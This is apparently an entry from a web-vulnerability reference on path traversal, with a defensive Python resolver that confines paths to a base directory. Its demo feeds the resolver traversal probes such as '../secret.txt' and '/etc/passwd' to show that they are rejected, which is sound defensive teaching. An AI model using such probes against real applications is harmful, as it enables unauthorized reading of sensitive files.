10. Path traversal

This flaw allows an attacker to use sequences such as ../ in a file path parameter to reach files and directories outside the intended scope of an application, potentially reading sensitive files or data.

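
The resolver below is an added example for this entry and for the file inclusion entry, not code from the page. It confines a user-supplied relative path to a base directory by comparing the symlink-resolved real path against the base, and rejects null bytes, absolute paths and percent-encoded traversal. The directory layout is built in a temporary directory for the demo.

```python
import os
import tempfile
from urllib.parse import unquote

# Added example: resolve a user-supplied relative path strictly inside a
# base directory. The directory layout is constructed in a temp dir.


class PathRejected(ValueError):
    pass


def resolve_under(base_dir, user_path):
    """Return the absolute, symlink-resolved path for user_path if and only
    if it stays inside base_dir; otherwise raise PathRejected."""
    if "\x00" in user_path:
        raise PathRejected("null byte")
    decoded = unquote(user_path)          # handle %2e%2e%2f once, before the checks
    if os.path.isabs(decoded) or decoded.startswith(("/", "\\")):
        raise PathRejected("absolute path")
    base_real = os.path.realpath(base_dir)
    candidate = os.path.realpath(os.path.join(base_real, decoded))
    # realpath follows symlinks, so a link inside base that points outside
    # resolves to its target and fails the containment check too.
    if os.path.commonpath([base_real, candidate]) != base_real:
        raise PathRejected(f"escapes base: {user_path!r}")
    return candidate


def read_under(base_dir, user_path):
    with open(resolve_under(base_dir, user_path), "rb") as fh:
        return fh.read()


def is_rejected(base_dir, user_path):
    try:
        resolve_under(base_dir, user_path)
        return False
    except PathRejected:
        return True


def build_demo_tree():
    """Create <root>/public/reports/q1.txt, <root>/secret.txt outside the
    served tree and, where the platform allows, a symlink inside public
    pointing at the secret. Returns (base_dir, symlink_created)."""
    root = tempfile.mkdtemp()
    base = os.path.join(root, "public")
    os.makedirs(os.path.join(base, "reports"))
    with open(os.path.join(base, "reports", "q1.txt"), "w") as fh:
        fh.write("q1 report")
    with open(os.path.join(root, "secret.txt"), "w") as fh:
        fh.write("top secret")
    try:
        os.symlink(os.path.join(root, "secret.txt"), os.path.join(base, "link.txt"))
        has_symlink = True
    except OSError:
        has_symlink = False
    return base, has_symlink


def symlink_escape_blocked():
    """True when a symlink inside base pointing outside is rejected
    (or when symlinks cannot be created on this platform)."""
    base, has_symlink = build_demo_tree()
    return (not has_symlink) or is_rejected(base, "link.txt")


if __name__ == "__main__":
    base, _ = build_demo_tree()
    print(read_under(base, "reports/q1.txt"))
    for probe in ("../secret.txt", "reports/../../secret.txt", "/etc/passwd", "%2e%2e/secret.txt"):
        print(f"{probe!r:30} rejected: {is_rejected(base, probe)}")
```

The containment check is on the final resolved path, not on the presence of `..` in the input, which is what defeats the encoding and `..../` variants. For file inclusion the stronger fix is to avoid paths from the client entirely and map an allow-listed name to a file on the server side.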